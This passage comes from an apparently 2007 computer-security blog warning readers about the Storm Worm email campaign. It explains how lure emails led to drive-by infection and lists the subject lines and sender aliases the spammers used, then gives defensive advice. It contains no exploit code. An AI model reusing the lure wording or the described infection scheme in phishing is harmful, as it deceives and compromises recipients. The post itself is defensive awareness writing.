  2. If JavaScript is enabled a script will instantly redirect them to a foreign server which is acting as a Worm host for their Botnet node. Once there, their browser will be subjected to at least three attempts to exploit different known vulnerabilities in unpatched Windows computers. Chances are very good that one of these attempts will be successful, unless the computer is very well protected and completely up to date with all available Windows patches and Internet Explorer 7 with all patches installed. Older versions of Firefox may also be at risk (prior to 2.0.0.6), if JavaScript is enabled, because the script initiates a file download. If the victim arrives using an older, unsupported version of Windows (9x, Me, 2000 before SP4, or XP with SP1), or is running an invalid pirated copy of Windows XP, they will NOT be up to date with critical patches and WILL probably be infected immediately (except for Limited User or Power User accounts).

Now that we know how Windows computers get infected, what are some of the current social engineering tricks being used to fool people into (A) opening the message, (B) reading it and (C) clicking on the obviously strange numeric link?

Subjects recently used in the Storm Worm e-mail messages include:
Postcard scams:
You've received a (postcard, ecard, greeting card) from a (Friend, Worshipper, Mate, Class-Mate, Family Member, etc).

Newest scam subjects as of mid-August, 2007:
Cat Lovers, Dated Confirmation, Internal Support, Internal Verification, Login Info, Login Information, Login Verification, Member Confirm, Member Details, Member Registration, Membership Details, Membership Support, New Member Confirmation, New User Confirmation, New User Details, New User Letter, New User Support, Poker World, Registration Confirmation, Registration Details, Secure Registration, Tech Department, Thank You For Joining, User Info, User Verification, Your Member Info, Welcome New Member

And the senders' aliases have been:

Bartenders guide, Bartenders Guide, Coolpics, Dog lovers, Entertaining pics, Entertaining pros, Fun World, Free ringtones, Free web tools, Game Connect, Internet Dating, Job search pros, Joke-a-day, Mobile Fun, MP3 world, Net gambler, Net-jokes, Online hook-up, Poker world, Resume Hunters, Ringtone heaven, Web, Web cooking, Web connects, Webtunes, Wine Lovers

To learn more about the payload delivered when a PC is infected with the Storm Worm, read my extended comments...

Continue reading "Email Threat - Trojan-Downloader "Storm Worm" - Its History, Payload and Variants" »


August 21, 2007

Beware of new variations of Storm Worm Trojan email threats

On July 1, 2007, I wrote a blog article titled "Warning; Trojan in Email Link: You've received a greeting postcard from a family member!" For well over a month my various email accounts were inundated with a constant daily flow of these Postcard scams. There is now an entirely new variation of these threats, in circulation World wide. For those who for some reason don't know what this is about (what rock have you been hiding under?), read the next paragraph. If you understand the basic nature of this threat you can skip to my extended comments.

Since sometime in June this year a Trojan Horse threat, called the "Storm Worm Trojan," has been circulating across the Internet, infecting millions of Windows PCs along its path. At first the subject and message body text referred to ecards, or (greeting) postcards supposedly sent to you from a "Friend," or "Worshipper," or "Class-Mate," or "Mate." They all provided a link (with a numeric IP address in the URL), to visit a website where you could view your card, which would remain viable for "the next 30 days." If you've been on the Internet for a long enough time you are probably aware that URLs are not usually numeric, but are in the form of named websites. Seeing a link that is numeric usually sets off alarm bells! A person would either have to be a total newbie to the Internet, or not accustomed to looking at the destination of links in their email client's status bar, or be using browser-based email that does not reveal the destination of links found in emails. Maybe the person receiving that email is a young child who isn't aware of the danger of such links and was excited to think they had received a greeting card.

Anybody who was tricked into clicking on the link was transported to a web page hosted on a compromised zombie computer on a home or business broadband network, located at the numeric IP found in the link they clicked on. This computer is already infected with the Storm Worm and has had a micro Web Server installed on it and is hosting a single web page. That web page contains JavaScript redirection codes and a plain text link to a copy of the Worm that has been placed on that computer. People going to that hostile web page with JavaScript disabled will see the link and the text will urge them to click on it to see their (ecard/message). If the victim arrived using a browser with JavaScript enabled, as most are, a hidden script on that page would send their browser to yet another website, where an image of a fake greeting card, or text about it is displayed. What the victim didn't know is that while they were looking at the fake ecard a hidden download was occurring that was automatically infecting their computer with the Storm Worm Trojan. This turned their computer into both a host of a similar redirection web page and as a sender of spam emails containing a link to their hostile web page, but sent through another compromised computer somewhere else in the World.

Judging by the millions of infected computers hosting these hostile web pages and sending spam links out, there are a lot of folks who have not been practicing "safe hex" (computing). They have not been keeping their Windows computers thoroughly updated and patched, and are not running up-to-date security software (both definitions and program updates). Read the tips in my extended comments about securing your PCs against this and other modern threats to your security.

Continue reading "Beware of new variations of Storm Worm Trojan email threats" »


July 1, 2007

Warning; Trojan in Email Link: You've received a greeting postcard from a family member!

If (rather, when) you receive an email with a subject line that matches or closely matches this:

You've received a greeting postcard from a family member!
or
You've received a postcard from a family member!

DELETE IT! These messages are sent from infected computers and contain links to go to a web page that is hosted on some poor schmuck's personal computer, on a broadband ISP connection, possibly with a static IP address. That web page contains exploit code that is used to download a Trojan Horse remote control program onto your computer. The bait is that a "family member" has just sent you a (greeting) postcard and there is a link to copy and paste into your browser's address bar (or to click on). If you mouse over that link you will see the numeric IP address in it. I have analyzed several of these recent spam messages and learned that they either point to a .hk (Hong Kong) domain, or a numeric IP address, followed by a question mark and a long group of hexadecimal characters (referred to as your card's claim number). The destinations are usually US based broadband customers' home computers that have had a (proxy) server surreptitiously installed, without the owner's knowledge. The ones I have looked at use a freeware server called "nginx." The web page they serve up contains a link to a copy of the Trojan program and deals with both people lacking and people having JavaScript enabled browsers. If you visit the link without JavaScript you will see a message that if you don't see your card you should click on a link. That link goes directly to an infected file on the hijacked computer. If you visit the page with JavaScript enabled you will be in danger of becoming infected by the JavaScript exploit that is encoded into a huge line of hostile code.

My advice, other than not even opening messages with the above mentioned subject lines, is to keep updated anti virus (and anti Trojan) and anti spyware programs running at all times on your computers. If you use Outlook (Express) or a similar stand alone email client you should add a spam/virus screening front-end program, like MailWasher Pro, which I use. MailWasher Pro uses a combination of an intelligent learning filter, blacklists of known spam, a virus detector, plain text display of messages and source codes, and best of all - user configurable filter rules. I have authored two sets of custom MailWasher filter rules. My filter rules are updated frequently to respond to the latest spam and scam threats and are available online, on my MailWasher Filters page. It was the ability to read incoming email source codes in MailWasher Pro that allowed me to discover the nature of these greeting postcard threats.

I hope this saves somebody from the misery of having their computer taken over due to ignorance and unpreparedness. Stay alert and keep your anti malware defenses running and up to date at all times. Assume that "they" are out to get you, because they are! If you receive a notice from your ISP that they suspect that your computers are sending out harmful messages - have the computers checked for proxy servers. Stay off-line until all vestiges of such programs have been completely removed, then equip your computers with the best security programs you can afford. There are links all over this page and others of mine for Spy Sweeper, Spyware Doctor, Norton Anti Virus and other similar products. Some offer a free trial, so use it, then purchase a subscription. Don't let your computers become unwitting members of zombie BotNets for use as spam/virus relays, or hosts for spamvertised websites.

Continue reading "Warning; Trojan in Email Link: You've received a greeting postcard from a family member!" »


About the author
Wiz's Blog is written by Bob "Wiz" Feinberg, an experienced freelance computer consultant, troubleshooter and webmaster. Wiz's specialty is in computer and website security. Wizcrafts Computer Services was established in 1996.


Creative Commons License This weblog is licensed under a Creative Commons License.
The content on this blog may be reprinted provided you do not modify the content and that you give credit to Wizcrafts and provide a link back to the blog home page, or individual blog articles you wish to reprint. Commercial use, or derivative work requires written permission from the author.